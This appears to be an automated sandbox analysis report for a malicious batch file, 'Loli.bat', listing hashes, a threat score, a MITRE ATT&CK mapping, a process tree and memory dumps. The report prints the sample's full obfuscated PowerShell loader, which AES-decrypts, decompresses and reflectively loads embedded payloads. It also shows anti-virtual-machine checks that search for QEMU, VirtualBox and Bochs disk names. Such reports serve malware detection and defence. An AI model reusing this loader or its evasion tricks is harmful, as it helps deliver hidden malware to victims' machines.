f8e1178ed62fc639722c51acc76f11eef71b79b6dadb09e47c09bc390769c3b1

General

Target

Loli.bat
Size

7.4MB
MD5

6b47b9a393a85371aae15aa9db27077b
SHA1

fe35bc8723726c87e960abc083c08ad444152223
SHA256

f8e1178ed62fc639722c51acc76f11eef71b79b6dadb09e47c09bc390769c3b1
SHA512

05588b1705a5879342ae111b62fa4df1f2d49e9837c36a6efcbf0674d6cedb4b104a52520284ff34221ba743811e5f084baa088fa8cce1867d242be44e6da847
SSDEEP

49152:7OWCuNaj2/KLCKx7QWjOUYFj3OwUWAxzz4N08iUjOq6xbgrbwkvR+if5AZVtlwzX:3

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1496	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1496	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1496	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2012 wrote to memory of 1948	2012	cmd.exe	31
PID 2012 wrote to memory of 1948	2012	cmd.exe	31
PID 2012 wrote to memory of 1948	2012	cmd.exe	31
PID 2012 wrote to memory of 2996	2012	cmd.exe	32
PID 2012 wrote to memory of 2996	2012	cmd.exe	32
PID 2012 wrote to memory of 2996	2012	cmd.exe	32
PID 2012 wrote to memory of 2684	2012	cmd.exe	33
PID 2012 wrote to memory of 2684	2012	cmd.exe	33
PID 2012 wrote to memory of 2684	2012	cmd.exe	33
PID 2012 wrote to memory of 2260	2012	cmd.exe	34
PID 2012 wrote to memory of 2260	2012	cmd.exe	34
PID 2012 wrote to memory of 2260	2012	cmd.exe	34
PID 2012 wrote to memory of 1980	2012	cmd.exe	35
PID 2012 wrote to memory of 1980	2012	cmd.exe	35
PID 2012 wrote to memory of 1980	2012	cmd.exe	35
PID 2012 wrote to memory of 1496	2012	cmd.exe	36
PID 2012 wrote to memory of 1496	2012	cmd.exe	36
PID 2012 wrote to memory of 1496	2012	cmd.exe	36

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2012
- C:\Windows\system32\fsutil.exe
  fsutil fsinfo drives
  2⤵
  PID:1948
- C:\Windows\system32\findstr.exe
  findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
  2⤵
  PID:2996
- C:\Windows\system32\fsutil.exe
  fsutil fsinfo drives
  2⤵
  PID:2684
- C:\Windows\system32\findstr.exe
  findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
  2⤵
  PID:2260
- C:\Windows\system32\cmd.exe
  cmd.exe /c echo function lLFL($Evck){ Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose '$mKWg=[GrSGrysGrteGrmGr.GrSGreGrcGruGrriGrtGryGr.GrCGrryGrpGrtoGrgrGraGrphGryGr.AGreGrsGr]:Gr:GrCGrreGratGreGr(Gr)Gr;'.Replace('Gr', ''); Invoke-Expression -Verbose '$mKWg.Mupoupdeup=[upSupyupsuptupeupmup.Supeupcupuuprupitupyup.Cupryuppuptoupguprauppuphupy.upCupiupphuperupMupoupdupe]up:up:CupBupC;'.Replace('up', ''); Invoke-Expression -WarningAction Inquire '$mKWg.Polaolddolinolgol=ol[olSolyolsolteolmol.olSoleolcuolrolitoly.olColryolpoltoolgolrolapolholyol.PoladoldoliolnolgMolooldeol]ol::olPolKolCSol7;'.Replace('ol', ''); Invoke-Expression -WarningAction Inquire -Debug '$mKWg.Kqzeqzy=qz[Sqzyqzsqztqzeqzmqz.qzCoqznqzvqzeqzrqzt]qz:qz:FqzroqzmqzBaqzsqze6qz4qzSqztrqziqznqzg("Oqzqqz2CqzCDqzaqzUqzoqz1qzpqzlqz9KqzdqzkqzdqzUqz/8qziqzbvqzXzqz7qzKvqzQqzOhqzHqzKqzciqz1qzzqzOAqzA1qzMqzgqz=qz");'.Replace('qz', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$mKWg.IoiVoi=[oiSyoisoitoieoimoi.oiCoionoivoieoiroitoi]:oi:oiFroiomoiBoiasoieoi64oiSoitoirioinoig("yoiWoiqQoiZBoiioi8oiYoiBoipoiHoiokoigoiVoi8oijoip9oiDoig=oi=");'.Replace('oi', ''); $QHGC=$mKWg.CreateDecryptor(); $nTbJ=$QHGC.TransformFinalBlock($Evck, 0, $Evck.Length); $QHGC.Dispose(); $mKWg.Dispose(); $nTbJ;}function shQb($Evck){ Invoke-Expression -InformationAction Ignore '$Mglv=Nmremrw-mrObmrjmremrcmrtmr mrSmrysmrtmremrmmr.mrIOmr.mrMemrmomrrmrySmrtmrremramrmmr(,$Evck);'.Replace('mr', ''); Invoke-Expression -Verbose '$GHjF=Nmremrw-mrObmrjmremrcmrtmr mrSmrysmrtmremrmmr.mrIOmr.mrMemrmomrrmrySmrtmrremramrmmr;'.Replace('mr', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire '$orXI=NWneWnw-WnObWnjWneWncWntWn WnSWnysWntWneWnmWn.WnIOWn.WnCoWnmpWnrWnesWnsWnioWnnWn.WnGZWniWnpWnStWnreWnaWnmWn($Mglv, [WnIWnO.WnCoWnmWnpWnrWneWnsWnsWnioWnnWn.WnCWnoWnmpWnrWnesWnsiWnoWnnMWnoWndeWn]Wn:Wn:DWneWncWnomWnprWneWnsWnsWn);'.Replace('Wn', ''); $orXI.CopyTo($GHjF); $orXI.Dispose(); $Mglv.Dispose(); $GHjF.Dispose(); $GHjF.ToArray();}function VoZH($Evck,$eEYb){ Invoke-Expression -InformationAction Ignore -Debug '$fypJ=[aZSaZysaZteaZmaZ.aZRaZeaZfaZlaZecaZtaZiaZoaZnaZ.AaZsaZseaZmbaZlaZy]aZ:aZ:LaZoaZaaZd([byte[]]$Evck);'.Replace('aZ', ''); Invoke-Expression -Debug '$vQiS=$fypJ.ErvnrvtrrvyPrvorvirvnrvtrv;'.Replace('rv', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose '$vQiS.yAIyAnvyAokyAeyA(yA$yAnyAuyAlyAl, $eEYb);'.Replace('yA', '');}$hMDf = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $hMDf;$TOQa=[System.IO.File]::ReadAllText($hMDf).Split([Environment]::NewLine);foreach ($oqEJ in $TOQa) { if ($oqEJ.StartsWith('JDHFE')) { $WJam=$oqEJ.Substring(5); break; }}$PQwI=[string[]]$WJam.Split('\');Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$wOZ = shQb (lLFL ([QACQAonQAveQArQAtQA]QA:QA:QAFQAroQAmQABQAaQAsQAe6QA4QAStQAriQAnQAg($PQwI[0].Replace("#", "/").Replace("@", "A"))));'.Replace('QA', '');Invoke-Expression -Verbose -InformationAction Ignore -Debug '$aAi = shQb (lLFL ([QACQAonQAveQArQAtQA]QA:QA:QAFQAroQAmQABQAaQAsQAe6QA4QAStQAriQAnQAg($PQwI[1].Replace("#", "/").Replace("@", "A"))));'.Replace('QA', '');Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire -Debug '$zlF = shQb (lLFL ([QACQAonQAveQArQAtQA]QA:QA:QAFQAroQAmQABQAaQAsQAe6QA4QAStQAriQAnQAg($PQwI[2].Replace("#", "/").Replace("@", "A"))));'.Replace('QA', '');VoZH $wOZ $null;VoZH $aAi $null;VoZH $zlF (,[string[]] (''));
  2⤵
  PID:1980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -WindowStyle Hidden
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1496

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1496-4-0x000007FEF5EDE000-0x000007FEF5EDF000-memory.dmp

Filesize
4KB

Download
memory/1496-6-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/1496-8-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/1496-9-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/1496-10-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/1496-7-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download
memory/1496-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/1496-11-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/1496-12-0x000007FEF5EDE000-0x000007FEF5EDF000-memory.dmp

Filesize
4KB

Download
memory/1496-13-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing